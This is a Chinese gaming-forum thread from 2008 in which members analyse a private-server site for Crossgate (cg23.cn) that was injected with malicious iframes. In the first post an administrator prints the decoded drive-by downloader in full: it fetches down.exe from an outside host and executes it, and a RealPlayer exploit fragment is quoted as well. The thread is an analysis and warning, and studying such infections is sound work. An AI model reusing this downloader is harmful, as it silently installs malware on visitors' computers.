打印

[讨论] cg23分析

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

阁楼大中小发表于 2008-2-4 21:47 只看该作者

cg23分析

Host: www.cg23.cn
Content-Location: http://www.cg23.cn/Index.htm
--src

<script language="JavaScript" type="text/JavaScript" src="http://news.baidu.com/ns?word=title%3A%C4%A7%C1%A6%B1%A6%B1%B4&tn=newsfcu&from=news&cl=2&rn=25&ct=0"></script>. M$ `, ]4 s! C4 P; m: f
--百度新闻-魔力宝贝

http://wpa.qq.com/pa?p=1:******************bbs.mocwww.com) L2 R1 b) |" f
10数个魔力技术顾问的QQ链接: e" T% M4 D6 i

<script src="javascript/jf.js" type="text/javascript"></script>
//模仿语言包式的简繁转换功能插件！

<script language="javascript" type="text/javascript" src="http://js.users.51.la/1326170.js"></script>
51.la流量统计

<script src='http://s71.cnzz.com/stat.php?id=722391&web_id=722391&online=2' language='JavaScript' charset='gb2312'></script>
cnzz流量统计魔力私服,最新魔力宝贝私服技术交流  D/ c; G* c# i% a# x
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( Y- \" q; r, e( A6 U" U
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=361527223&logo=12"></script>
51YES网站统计妖城在线论坛# E7 a& w0 I; B9 ]. Y6 k
) g6 Z7 A% f$ L0 z' X' [
<iframe src=http://1.100190.com/1.htm?6 width=50 height=0></iframe></a>
下面是1.htm的内容
[<iframe src=http://1.100190.com/d/d.htm width=100 height=100></iframe>—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート) T3 k4 o0 ^, j, y+ s6 `/ [
<iframe src=http://1.100190.com/d/06014.htm width=100 height=100></iframe>
<iframe src=http://1.100190.com/d/real.htm width=100 height=100></iframe>—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート& Z4 g" K8 N/ d0 r" |* b* _0 n
这里是重点了* i7 A3 T8 }6 {: H" ]0 Y* h% r# W
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1586580.js"></script>魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表( E1 W# A* P) j6 ]) D
51.la流量统计
]
闲来无事，给大家分析一下吧
06014.htm 看名字好像是蛮老的那个溢出洞洞2 o8 ?, t  b9 g
解码后
<script>var fuck,cike;fuck="http://1.111281.com/down.exe";cike="cike.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",fuck,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(cike,2);as.close();var shell=ado.createobject("Shell.Application","");shell.Shellexecute(cike,"","","open",0);}catch(e){};</script>
貌似是个下载者饿，打包了，大家没事研究研究我就跳过了……bbs.mocwww.com3 a0 `& r6 n' K" j8 T( K7 n  k) p

d.htm 解码之
<iframe style=display:none src="http://1.100190.com/d/bf.htm"></iframe>魔力私服,最新魔力宝贝私服技术交流7 \0 b; x1 v+ b, U0 |
呜呜，我们继续
空文件，可能是后备用的吧魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表& x  P+ K6 O7 m: [! j

real.htm 看名字可能根播放器的oday有关9 i8 Z; P7 L1 b; g# G
解码之——( _8 q% F5 [4 ]% ^
function RealExploit(){afdsffffasdf="flsdajflasdjfl32rewr231ffas";var ……—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート* z8 E7 ]+ g! }7 f0 ^
恩，查资料得知为机器狗病毒，不过不玩这个不大懂
好了，确定是网马，至于效果如何，反正我没中招……魔力私服,最新魔力宝贝私服技术交流7 A& ~. _4 b4 ~& d- A; N
魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表7 e: O+ @3 m/ c1 l( k
就酱子吧，很多防护不好的网站都会被人挂马，希望cde尽快处理，我对其人没有任何恶意的，大家不要有事没事就对他妄加否定，bbs.mocwww.com  S+ y6 Y% j1 W* y" q
想想人家辛辛苦苦为了什么那？开那么多群，没说过收费什么的吧？有知道的东西就共享出来也没见藏着掖着吧？ —魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート+ {% u7 g6 z4 j; R6 d( u  ^
紫薇剑是谁我不晓得，
但是cg23的ange我还是打过交道的……魔力私服,最新魔力宝贝私服技术交流7 [$ V/ {. l# D
妖城在线论坛# h* G# ?; e  }9 k6 |! Z" X
<param name="URL" value="http://www.jdzblog.com/uploadfiles/2007-3/327162852.mp3">
最后给大家附个音乐深吸一口气，放松一下，没什么大不了的……

[ 本帖最后由 myzz01 于 2008-2-4 21:53 编辑 ]

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

沙发大中小发表于 2008-2-4 21:49 只看该作者

那个是内嵌的JS调用溢出马.很老的一种了..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート" g1 s+ g; H8 `
LS的兄弟我劝你..—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート5 b) P9 i3 b9 r. H
搞CG,不知道紫薇剑,就和中国人不知道毛泽东一样.
你没资格说内些话..

你的名气很大，并不代表着你很强大。

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

板凳大中小发表于 2008-2-4 21:50 只看该作者

开那么多群.从来没说过话.
和某XXOO反挂不一样?
技术群一大堆.问问题没见回.
一买他东西积极的很.魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表' g5 f0 K+ A: O4 j. H

/ M3 Y* H* t% A z
他现在扔出来的东西都是别人淘汰的.魔力私服,最新魔力宝贝私服技术交流8 e# d. F1 x# N9 c( f9 Z$ l8 T
也不知道谁抱着一套所谓的反挂,还当宝咧..

你的名气很大，并不代表着你很强大。

TOP

厶⒉姙⒈

ＬilimedＡ

妖帅

Rank: 9 Rank: 9 Rank: 9

☆為了水王的榮耀！

UID: 2296
精华: 6
积分: 4979
威望: 2 度
性别: 女

妖城妖将勋章女性会员勋章优秀会员勋章抢沙发大王专用勋章灌水天才勋章爱心使者专用勋章

地板大中小发表于 2008-2-4 21:58 只看该作者

这样啊··

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

地下室 大中小发表于 2008-2-4 21:59 只看该作者

那个  资格不晓得要怎么赚取 …… :-)  是不是当中国人只要知道毛泽东就具备中国人的血统了？估计某些知道老毛的小日本要雀跃了……
血统是与生俱来的，根毛泽东关系不大，我的资格仿佛也根我知道不知道紫薇剑关系不大吧？
我喜欢根海星兄妖哥小男这样说话爽快的人交流，至于不从技术方面讨论问题而专门搞人事鉴定的……  不是很感冒……
(*^__^*) 随便说说拉 ange真的打了很久叫道的从我开始研究魔力（快1个月了）没事都会在QQ上交流下的 ——感觉人有点迷糊但是没有什么坏心眼吧？
至于FGMAX ：）我可是加你QQ拜师的哦可惜你不回复…… 唉  要不现在收下我吧？

TOP

FGMAX

i'm EE!!

妖将

Rank: 5 Rank: 5

不认识的朋友叫我EE。

UID: 2851
精华: 6
积分: 2786
威望: 0 度
性别: 男

妖城妖使勋章

6楼大中小发表于 2008-2-4 22:08 只看该作者

我，大家都知道，对话不对人。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表8 p; a6 n1 k% h2 G& z$ \2 Z# Y
要是惹着你了就当别在意。bbs.mocwww.com. g" I# g% ^' t( {; R" g$ g6 u! w4 \

加我人太多，每天问问题人也太多。魔力私服,最新魔力宝贝私服技术交流$ ^% n5 h2 t( U* g6 b
不能一一照料。

我就收了一个徒弟，晨曦。妖城在线论坛' p/ j$ f& x1 \+ T! B
魔力私服,最新魔力宝贝私服技术交流3 H& d3 ^, o; J
以后有需要就说，知道肯定告你。

你的名气很大，并不代表着你很强大。

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

7楼大中小发表于 2008-2-4 22:28 只看该作者

引用:

原帖由 FGMAX 于 2008-2-4 22:08 发表 bbs.mocwww.com; O8 X$ \( U/ a/ Q& k
我，大家都知道，对话不对人。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表+ {. O& C7 l- g8 Z
要是惹着你了就当别在意。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表5 i8 ^5 r1 m# C2 u* P5 g/ v
妖城在线论坛" w9 r) E: ~- w' `
加我人太多，每天问问题人也太多。妖城在线论坛2 Y- l; l4 F% h* t, b3 L' x
不能一一照料。" R" u9 N/ L/ d0 K
3 ~* u' X" T/ S7 ]0 Z
我就收了一个徒弟，晨曦。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表; L) Y; C; t! _* P/ R* D" B- I
1 R5 |/ k2 z5 h. d, I8 W5 ]8 F' t
以后有需要就说，知道肯定告你。

bbs.mocwww.com. P6 \ d3 G, G" A. n, a
( H! W8 K) [5 U1 D0 [- x; ~; |

：）交个朋友一起交流饿 …… 我去想办法看懂魔力封包处理部分的代码去…… 想学的东西太多时间太少一动就该睡觉了……郁闷　ＨＯＨＯ　　晚上见……

TOP

31558770a

禁止访问

UID: 3449
精华: 5
积分: 1089
威望: 1 度

8楼大中小发表于 2008-2-4 22:38 只看该作者

回家前上来看看—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート n$ j! q) _& \1 Q- C# h6 j

TOP

itsong

禁止访问

UID: 1906
精华: 1
积分: 294
威望: 1 度
性别: 男

9楼大中小发表于 2008-2-4 22:45 只看该作者

RealPlayer 的溢出漏洞,打完RealPlayer溢出补丁的不会中.

TOP

ｋ|尛水

全都不复存在了

版主

Rank: 16

不仰望别人、自己亦是风景、

UID: 4435
精华: 2
积分: 866
威望: 0 度

妖城妖帅勋章女性会员勋章抢沙发大王专用勋章

10楼 大中小发表于 2008-2-4 22:53 只看该作者

RealPlayer 不装呢- -

TOP

healcs01

黑羽の庆

妖精

Rank: 2 Rank: 2

UID: 1562
精华: 2
积分: 449
威望: 0 度
性别: 男

11楼 大中小发表于 2008-2-5 08:54 只看该作者

CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问我日

TOP

黄昏

管理员

Rank: 32

UID: 3983
精华: 1
积分: 1132
威望: 5 度

妖城妖帅勋章优秀版主专用勋章超级版主专用勋章优秀会员勋章爱心使者专用勋章高尚无私奉献心勋章资深元老勋章

12楼 大中小发表于 2008-2-5 09:50 只看该作者

引用:

原帖由 ?ｋ|尛水 于 2008-2-4 22:53 发表妖城在线论坛. B/ t6 A- M& {7 l6 V7 @5 `
RealPlayer 不装呢- -

bbs.mocwww.com% O. t. _0 K, Y4 e/ X9 n- Y
不装当然就中不了real的0day了，不过其他溢出漏洞不胜枚举，而且就算不中马，被挂马的站访问起来也会很慢…… 经常访问很容易体会出区别…… 中木马也一样你要经常使用电脑就会有手感的当机器中木马病毒什么的你就会感觉不顺手了……

TOP

xuyaoxy

泪

版主

Rank: 16

Namida

UID: 2725
精华: 8
积分: 11933
威望: 7 度

妖城妖皇勋章版主专用勋章女性会员勋章优秀会员勋章抢沙发大王专用勋章灌水天才勋章小财主专用勋章大富翁专用勋章宣传大使专用勋章资深元老勋章 ˋ♥ˊ 妖花勋章

13楼 大中小发表于 2008-2-5 10:49 只看该作者

呵呵...real我就没装过~~呵呵..

2007年10月6日至今已过去十三个春夏秋冬，感谢妖友的一路陪伴！
2020年6月12日 By.xuyaoxy

TOP

易凡

妖城欢迎您

管理员

Rank: 32

Administrator

UID: 1
精华: 2
积分: 7077
威望: 5 度
性别: 男

14楼 大中小发表于 2008-2-6 13:41 只看该作者

我问问无双，是被人挂了还是自己搞的……。它那站流量也没多少，应该不至于坏自己的名声做这种事。魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表7 C6 B+ h5 P1 ]7 X" {* S
/ ?8 q* L6 j- ^: j' v+ d8 \
现在有马是事实了

妖城欢迎您！

TOP

囡囡

… ° 。﹎?囡_▂_▂_▂。 °?

妖将

Rank: 5 Rank: 5

╭ つ\'娚亽莈嗰恏涷覀||▌

UID: 1787
精华: 7
积分: 1683
威望: 2 度
性别: 女

妖城妖帅勋章

15楼 大中小发表于 2008-2-6 15:25 只看该作者

没说过收费?那他的高级群谁出的QB,你也不想想

TOP